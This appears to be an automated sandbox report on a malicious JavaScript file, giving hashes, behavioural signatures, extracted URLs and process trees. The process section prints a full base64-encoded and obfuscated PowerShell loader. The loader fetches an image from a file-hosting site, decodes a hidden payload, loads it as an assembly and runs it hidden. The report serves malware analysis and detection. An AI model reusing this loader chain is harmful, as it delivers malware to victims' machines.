Analysis
-
max time kernel
18s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
20-11-2024 17:17
Static task
static1
Behavioral task
behavioral1
Sample
uPh2C.js
Resource
win7-20240903-en
General
-
Target
uPh2C.js
-
Size
58KB
-
MD5
705e54950f28c565dbe4818eb2be7423
-
SHA1
19ff36dbb676a64197e0a645adf317d2b9cc17d3
-
SHA256
0844465dfa8bb241f452c320bc6caf6cec645b461dbcd468a2afc9dc900e595c
-
SHA512
cc9b21272ba9a2fa038a82c8206303575ce9374f1275b9c394407828c475789616e914befecf58e25c94d451fa92d5a313a611188516b4120015846dac56288f
-
SSDEEP
1536:a0vDHXpEjO9Xwq2Sk6e2Nhxdd5pdLv+l/4QmuWOMP3HXpEjO9Xwq2Sk6e2Nhxddi:aoDHXp+q62Nhxdd5pdq61HXp+q62Nhx6
Malware Config
Extracted
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2204 powershell.exe 6 2204 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2944 powershell.exe 2204 powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2944 powershell.exe 2204 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2944 powershell.exe Token: SeDebugPrivilege 2204 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2512 wrote to memory of 2944 2512 wscript.exe 30 PID 2512 wrote to memory of 2944 2512 wscript.exe 30 PID 2512 wrote to memory of 2944 2512 wscript.exe 30 PID 2944 wrote to memory of 2204 2944 powershell.exe 32 PID 2944 wrote to memory of 2204 2944 powershell.exe 32 PID 2944 wrote to memory of 2204 2944 powershell.exe 32
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\uPh2C.js1⤵
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAgACgAIAAkAEUATgBWADoAQwBvAG0AcwBQAEUAQwBbADQALAAxADUALAAyADUAXQAtAEoATwBpAG4AJwAnACkAIAAoACAAKAAnAEgATAAxAGkAbQBhAGcAZQBVAHIAbAAgAD0AIABPAEoAMABoAHQAdABwAHMAOgAvAC8AMQAwADEANwAuAGYAaQBsAGUAbQBhAGkAbAAuAGMAbwBtAC8AYQBwAGkALwAnACsAJwBmAGkAbABlAC8AZwBlAHQAPwBmAGkAbABlAGsAZQB5AD0AMgBBAGEAXwAnACsAJwBiAFcAbwA5AFIAZQB1ADQANQB0ADcAQgBVADEAawBWAGcAJwArACcAcwBkACcAKwAnADkAcABUADkAcABnAFMAUwBsAHYAUwB0AEcAcgBuAFQASQAnACsAJwBDAGYARgBoAG0AVABLAGoAMwBMAEMANgBTAFEAdABJAGMATwBjAF8AVAAzADUAdwAmAHAAawBfAHYAaQBkAD0AZgBkADQAZgA2ADEANABiAGIAMgAwADkAYwA2ADIAYwAxADcAMwAwADkANAA1ADEANwA2AGEAMAA5ADAANABmACAATwBKADAAOwBIACcAKwAnAEwAMQB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsASABMADEAaQBtAGEAZwBlAEIAeQB0AGUAcwAgAD0AIABIAEwAMQB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgASABMADEAaQBtAGEAZwBlAFUAcgBsACkAOwBIAEwAMQBpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABIAEwAMQBpAG0AYQBnAGUAQgB5AHQAZQBzACkAOwBIAEwAMQBzAHQAYQByAHQARgBsAGEAZwAgAD0AIABPAEoAMAA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+AE8ASgAwADsASABMADEAJwArACcAZQBuAGQARgBsAGEAZwAgAD0AIABPAEoAMAA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4ATwBKADAAOwBIAEwAMQBzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgAEgATAAxAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AJwArACcAZgAoAEgATAAxAHMAdABhAHIAdABGAGwAYQBnACkAOwBIAEwAMQBlAG4AZABJAG4AZABlAHgAIAA9ACAASABMADEAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgASABMADEAZQBuAGQARgBsAGEAZwApADsASABMADEAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIABIAEwAMQBlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgAEgATAAnACsAJwAxAHMAdABhAHIAdABJAG4AZABlAHgAOwBIAEwAMQBzAHQAYQByAHQAJwArACcASQBuAGQAZQB4ACAAKwA9ACAASABMADEAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7AEgATAAxAGIAJwArACcAYQBzAGUANgA0AEwAZQBuAGcAdABoACcAKwAnACAAPQAgAEgATAAxACcAKwAnAGUAbgBkAEkAbgBkAGUAeAAgAC0AIABIACcAKwAnAEwAMQBzAHQAYQByAHQASQBuAGQAZQB4ADsASABMADEAYgAnACsAJwBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAgAD0AIABIAEwAMQBpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgASABMADEAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAASABMADEAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAKQA7AEgATAAxAGIAYQBzAGUANgA0AFIAZQB2AGUAcgBzAGUAZAAgAD0AIAAtAGoAbwBpAG4AIAAoAEgATAAxAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQALgAnACsAJwBUAG8AQwBoAGEAcgBBAHIAcgBhAHkAKAApACAASQBPAEUAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACAASABMADEAXwAgAH0AKQBbAC0AMQAuAC4ALQAoAEgATAAxAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQALgBMAGUAbgBnAHQAaAApAF0AOwBIAEwAMQBjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgASABMADEAYgBhAHMAZQA2ADQAUgBlAHYAZQByAHMAZQBkACkAOwBIAEwAMQBsAG8AYQAnACsAJwBkAGUAJwArACcAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEgATAAxAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQAnACsAJwBzACkAOwBIAEwAMQB2AGEAaQBNAGUAdABoAG8AZAAgAD0AIABbAGQAbgBsAGkAYgAuAEkATwAuAEgAbwBtAGUAXQAuAEcAZQB0AE0AZQB0AGgAbwBkACgATwBKADAAVgBBACcAKwAnAEkATwBKADAAKQA7AEgATAAxAHYAYQBpAE0AZQB0AGgAbwBkAC4ASQBuAHYAbwBrAGUAKABIAEwAMQBuAHUAbABsACwAJwArACcAIABAACgATwBKADAAMAAvAHQAUQA5AEgAMQAvAGQALwBlAGUALgBlAHQAcwBhAHAALwAvADoAcwBwAHQAdABoAE8ASgAwACwAIABPAEoAMABkAGUAcwBhAHQAaQB2AGEAZABvAE8ASgAwACwAIAAnACsAJwBPAEoAMABkAGUAcwBhAHQAaQB2AGEAZABvAE8ASgAwACwAIABPAEoAMABkAGUAcwBhACcAKwAnAHQAaQB2AGEAZABvAE8ASgAwACwAIABPAEoAMABNAFMAQgB1AGkAbABkAE8ASgAwACwAIABPAEoAMABkAGUAcwAnACsAJwBhAHQAaQB2AGEAZABvAE8ASgAwACwAJwArACcAIABPAEoAMABkAGUAcwBhAHQAaQB2AGEAZABvAE8ASgAwACwATwBKADAAZABlAHMAYQB0AGkAdgBhAGQAbwBPAEoAMAAsAE8ASgAwAGQAZQBzAGEAdABpAHYAYQBkAG8ATwBKADAALABPAEoAMABkAGUAcwBhAHQAaQB2AGEAZABvAE8ASgAwACwATwBKADAAZABlAHMAYQB0AGkAdgBhAGQAbwBPAEoAMAAsAE8ASgAwAGQAZQBzAGEAdABpAHYAYQBkAG8ATwBKADAALABPACcAKwAnAEoAMAAxAE8ASgAwACwATwBKADAAZABlAHMAYQB0AGkAdgBhAGQAbwBPAEoAMAApACkAOwAnACkALgBSAGUAcABsAEEAQwBFACgAKABbAGMASABBAHIAXQA3ADMAKwBbAGMASABBAHIAXQA3ADkAKwBbAGMASABBAHIAXQA2ADkAKQAsACcAfAAnACkALgBSAGUAcABsAEEAQwBFACgAKABbAGMASABBAHIAXQA3ADIAKwBbAGMASABBAHIAXQA3ADYAKwBbAGMASABBAHIAXQA0ADkAKQAsAFsAUwBUAHIAaQBuAGcAXQBbAGMASABBAHIAXQAzADYAKQAuAFIAZQBwAGwAQQBDAEUAKAAoAFsAYwBIAEEAcgBdADcAOQArAFsAYwBIAEEAcgBdADcANAArAFsAYwBIAEEAcgBdADQAOAApACwAWwBTAFQAcgBpAG4AZwBdAFsAYwBIAEEAcgBdADMAOQApACkA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENV:ComsPEC[4,15,25]-JOin'') ( ('HL1imageUrl = OJ0https://1017.filemail.com/api/'+'file/get?filekey=2Aa_'+'bWo9Reu45t7BU1kVg'+'sd'+'9pT9pgSSlvStGrnTI'+'CfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f OJ0;H'+'L1webClient = New-Object System.Net.WebClient;HL1imageBytes = HL1webClient.DownloadData(HL1imageUrl);HL1imageText = [System.Text.Encoding]::UTF8.GetString(HL1imageBytes);HL1startFlag = OJ0<<BASE64_START>>OJ0;HL1'+'endFlag = OJ0<<BASE64_END>>OJ0;HL1startIndex = HL1imageText.IndexO'+'f(HL1startFlag);HL1endIndex = HL1imageText.IndexOf(HL1endFlag);HL1startIndex -ge 0 -and HL1endIndex -gt HL'+'1startIndex;HL1start'+'Index += HL1startFlag.Length;HL1b'+'ase64Length'+' = HL1'+'endIndex - H'+'L1startIndex;HL1b'+'ase64Command = HL1imageText.Substring(HL1startIndex, HL1base64Length);HL1base64Reversed = -join (HL1base64Command.'+'ToCharArray() IOE ForEach-Object { HL1_ })[-1..-(HL1base64Command.Length)];HL1commandBytes = [System.Convert]::FromBase64String(HL1base64Reversed);HL1loa'+'de'+'dAssembly = [System.Reflection.Assembly]::Load(HL1commandByte'+'s);HL1vaiMethod = [dnlib.IO.Home].GetMethod(OJ0VA'+'IOJ0);HL1vaiMethod.Invoke(HL1null,'+' @(OJ00/tQ9H1/d/ee.etsap//:sptthOJ0, OJ0desativadoOJ0, '+'OJ0desativadoOJ0, OJ0desa'+'tivadoOJ0, OJ0MSBuildOJ0, OJ0des'+'ativadoOJ0,'+' OJ0desativadoOJ0,OJ0desativadoOJ0,OJ0desativadoOJ0,OJ0desativadoOJ0,OJ0desativadoOJ0,OJ0desativadoOJ0,O'+'J01OJ0,OJ0desativadoOJ0));').ReplACE(([cHAr]73+[cHAr]79+[cHAr]69),'|').ReplACE(([cHAr]72+[cHAr]76+[cHAr]49),[STring][cHAr]36).ReplACE(([cHAr]79+[cHAr]74+[cHAr]48),[STring][cHAr]39))"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2204
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD55b6afa02aeeb997e8f50f5b9298d5310
SHA1274679b0a94f39ddaac11b9859e85ba50aea392a
SHA256d036bdd83dd03502dd73cd2184ac712752906f27babae6f95a0df20ec5463237
SHA5124ecb7e21f61009f7721dfd10dfbbdfcf79b8379164babda4c3e964b9f95757cb5b57abb1a92b92642f427a23a2ca74acc078dec5d7b4f1ca412f84de8147bf19